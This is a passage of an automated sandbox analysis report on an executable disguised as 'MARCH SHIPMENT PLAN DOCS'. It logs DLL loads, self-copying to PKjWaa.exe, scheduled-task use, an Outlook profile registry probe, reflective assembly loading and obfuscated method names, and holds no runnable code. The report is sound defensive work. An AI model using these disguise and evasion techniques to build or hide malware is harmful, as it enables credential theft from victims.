              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: rasapi32.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: rasman.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: rtutils.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: dhcpcsvc.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: secur32.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: schannel.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: mskeyprotect.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: ntasn1.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: ncrypt.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: ncryptsslp.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeSection loaded: dpapi.dll
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: MARCH SHIPMENT PLAN DOCS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: MARCH SHIPMENT PLAN DOCS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: MARCH SHIPMENT PLAN DOCS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: HnGT.pdbSHA256l source: MARCH SHIPMENT PLAN DOCS.exe, PKjWaa.exe.0.dr
              Source: Binary string: HnGT.pdb source: MARCH SHIPMENT PLAN DOCS.exe, PKjWaa.exe.0.dr

              Data Obfuscation

              barindex
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nXBoW3ckpU9SC4eyo6.cs.Net Code: boFg3mK9Y9 System.Reflection.Assembly.Load(byte[])
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.2e1f3bc.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.70d0000.3.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: 12.2.PKjWaa.exe.2f7f20c.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
              Source: MARCH SHIPMENT PLAN DOCS.exeStatic PE information: 0x85188FDE [Thu Oct 4 16:03:42 2040 UTC]
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_02AE469F push edx; retf 0_2_02AE46A2
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_02AE469B push edx; retf 0_2_02AE469E
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_02AE4698 push edx; retf 0_2_02AE469A
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_02AE4658 push edx; retf 0_2_02AE465A
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_02AE4790 push esi; retf 0_2_02AE4792
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_02AE475B push esi; retf 0_2_02AE4762
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_02AE4759 push esi; retf 0_2_02AE475A
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_071BC010 push eax; iretd 0_2_071BC011
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_071BC092 pushfd ; iretd 0_2_071BC095
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_071B1CEE push ds; retf 0_2_071B1CEF
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_0BC11AC5 push FFFFFF8Bh; iretd 0_2_0BC11AC7
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 0_2_0BC119CA push dword ptr [ebx+ebp-75h]; iretd 0_2_0BC119D5
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_02F29C30 push esp; retf 02F4h10_2_02F29D55
              Source: C:\Users\user\Desktop\MARCH SHIPMENT PLAN DOCS.exeCode function: 10_2_06F2890D push es; ret 10_2_06F28920
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_0705C010 push eax; iretd 12_2_0705C011
              Source: C:\Users\user\AppData\Roaming\PKjWaa.exeCode function: 12_2_0BA30A55 push FFFFFF8Bh; iretd 12_2_0BA30A57
              Source: MARCH SHIPMENT PLAN DOCS.exeStatic PE information: section name: .text entropy: 7.811889203756963
              Source: PKjWaa.exe.0.drStatic PE information: section name: .text entropy: 7.811889203756963
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nfoiYwMtQAOK6pF4db.csHigh entropy of concatenated method names: 'F7lKapyNAo', 'JvNKjCBEp4', 'OG8Kqppr9M', 'MKjK7uZl6H', 'n8tKApGijB', 'KjoK52lKBj', 'ur5KFbJ0e2', 'p3YKmVoB3k', 'HkbKf8VbfF', 'A0GK1fIf0r'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, rQenLIqO6c3psvUyRd.csHigh entropy of concatenated method names: 'ToString', 'qa9VHSrKvp', 'WXAVOZDgjh', 'vGkVE3WxiS', 's32VDAbnOZ', 'bsXVGv1O66', 'D0jVihPiZX', 'arWVUWSGgR', 'HDhVWRwby6', 'fnPVy8BsEA'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, om6a3f5O5IPdfXqVw0.csHigh entropy of concatenated method names: 'Bp9Qm4K46l', 'nkCQ1WbsVA', 'RJBtJqIJuW', 'arctNGNwWc', 'SHfQHWENj9', 'HoFQL2HOMP', 'IXTQ4sEZ3d', 'Tr5Qaj28J7', 'UxrQjRlABr', 'FD3QqJxY6d'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, KreSWHNNvDsxiSK6PdV.csHigh entropy of concatenated method names: 'yTAn1rfy6T', 'TrEnz1eaVS', 'bNi0Jy9ELC', 'B2G0Nqm4B0', 'aqe0Z0mYbM', 'uaF0uQEod4', 'fYK0gmXLSB', 'zTR08MmeQJ', 'zBo0Pd1YF5', 'uuU0KrlBtm'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, X9sKVY4SrGCHEjiTSB.csHigh entropy of concatenated method names: 'kqmrMXVO7O', 'xPursIRULi', 'nGMrCkd5u8', 's0irOAryKl', 'vrjrDYra3P', 'Q5ErGoCIcs', 'dVwrUnJqH7', 'jVarWAQilJ', 'enGrxNg1W4', 'OqirHdbI5B'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, rQFiuoFyrPdWsYJsSX.csHigh entropy of concatenated method names: 'H5sBbxjFJj', 'm62BQNfkRk', 'je6BBrhtQI', 'AmUB07lXUr', 'LAJB2r8og4', 'aSdBhrk3Dr', 'Dispose', 'XSUtPPPfvc', 'fkGtKZqmdB', 'Pg3teaafwT'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, IYALM4siSyij1kE7im.csHigh entropy of concatenated method names: 'Vqre9guXLd', 'UHtevANXlm', 'qQDeMNXT47', 'vhmesRaBgt', 'kklebt8rhP', 'grveVjyO8k', 'V9HeQxE7UM', 'KB8etpEhQp', 'bl7eBOGk9O', 'ooJenB04sk'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, lmITPyzH0vvGRuJTF2.csHigh entropy of concatenated method names: 'ROlnvWrcEO', 'mMZnMKYhgF', 'R40nsgTBR6', 'jbYnCZ20J5', 'u4hnOopmjO', 'EfEnDxF7Ne', 'sGtnGySTLi', 'UXBnhv69Yi', 'qV0n6Zra6x', 'v4SnX5DviK'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, Cl2sptK8PqlH18RbIm.csHigh entropy of concatenated method names: 'Dispose', 'fdWNfsYJsS', 'U0ZZO2mUkE', 'FZwMX8HAp3', 'zhIN1TXXQG', 'zJZNzRdCtu', 'ProcessDialogKey', 'hw1ZJwItn6', 'pMUZNKFJA7', 'ExdZZ5wjv2'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, gLtKefNZaY130Hx7qSi.csHigh entropy of concatenated method names: 'ToString', 'sxU0MQrvjR', 'bpO0sX2hei', 'nOR0YLhFxj', 'BiJ0CdW04k', 'YwP0OY29xF', 'FDm0E6d0vS', 'ntF0DDZQrr', 'GYtyM1Lv8pwnHlcZlWy', 'aoq9PKLl327MJUW5viK'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, KbOLHcyNOTSqYWNxKB.csHigh entropy of concatenated method names: 'z5fp61wurY', 'SbOpXfHFEC', 'gM8p3YJu3J', 'kyNp95gKen', 'Vb2pSmk5J7', 'GnRpvUviX1', 'jxHpk2f0Ts', 'VTkpMQ5t6u', 'ODvpsEfCD4', 'IfSpYTs6UR'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, Vwjv2l1ICUc2lH0ZNw.csHigh entropy of concatenated method names: 'wmYneJQlMe', 'OvanlB8ZCo', 'FqgnIGpSwl', 'T71np92mmo', 'Jq9nBIog4H', 's7XncYG0Dw', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, eR2MkENJvpNgTcg6eHy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nvhnHGPYsO', 'XU3nLg9Bal', 'x1hn4DC1MT', 'DKFnalub6B', 'o3FnjvEyHg', 'v9tnq82G1i', 'bIun7mhfOS'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, qA1OjRUtjDoSpid5ve.csHigh entropy of concatenated method names: 'hiqpPGPuqv', 'Xo1pelhpmT', 'EDxpIRINCK', 'cwtI1wDGLP', 'bw6IzdMvGe', 'MK8pJb5wob', 'JAupNgmV5n', 'RyHpZZ52iB', 'oMwpuCFdg4', 'SP0pg13K58'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, bLDjPRZEAtUr3S7TUf.csHigh entropy of concatenated method names: 'IPa3b5hwW', 'KNN9LfmQA', 'A0xvZx4QB', 'ql5kDXVcd', 'e5SsZPKNH', 'jYpY8QLaA', 'VNB3srfNsJeuEeOrxh', 'w6EN7kHrHHUrT28SU7', 'djXStsUXDqIW8hT3qe', 'R3RtKE6tJ'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, nXBoW3ckpU9SC4eyo6.csHigh entropy of concatenated method names: 'xeAu8q7eQZ', 'z8CuPxuVSh', 'qPOuKcNYJG', 'X5LueeKttD', 'F1QulNX5Nx', 'dNeuIra3Gn', 'dl2up8wrNu', 'TZ8ucanxrF', 'm0TuwdMBui', 'EMCudCoCPR'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, BVKRUIC45ZBSWRFHF9.csHigh entropy of concatenated method names: 'PEmI8wZrIP', 'ARGIKOW6MM', 'lrtIlhRo7R', 'vYCIpThO6C', 'qx0IckXCNo', 'awclAZIkGf', 'U8Al5gH70b', 'mQXlFQxgB6', 'nXKlmHfdGB', 'R4KlfCly6Q'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, Ntk4OH7nUKDFSVjdDO.csHigh entropy of concatenated method names: 'YP2Qd9jprD', 'JfsQRysq5C', 'ToString', 'tNCQP4tkHq', 'oinQKQNchR', 'jxJQemQyay', 'TSPQlYI2EY', 'qvUQI7910Z', 'JLgQpbPfbW', 'U4wQcLOLub'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, qNAKxpgTDt25IYVdiH.csHigh entropy of concatenated method names: 'zVrNpfoiYw', 'rQANcOK6pF', 'QiSNdyij1k', 'H7iNRmDkQs', 'cvANbo1vVK', 'mUINV45ZBS', 'xIdSiXx7s5E09t4V3P', 'YqcDAjTu9mOcsuwxYy', 'cooNNSyu2r', 'DirNualy6Z'
              Source: 0.2.MARCH SHIPMENT PLAN DOCS.exe.8900000.4.raw.unpack, YwItn6fVMUKFJA7sxd.csHigh entropy of concatenated method names: 'HR9BC0uLcH', 'oHNBOX13HE', 'nSxBE9ED1Z', 'PAqBDlFFYT', 'rdyBGiONNS', 'HAHBiLWMqd', 'w3tBUU0A4X', 'MWwBWDyXeM', 'E1WByP91eU', 'RfuBxpr2iB'
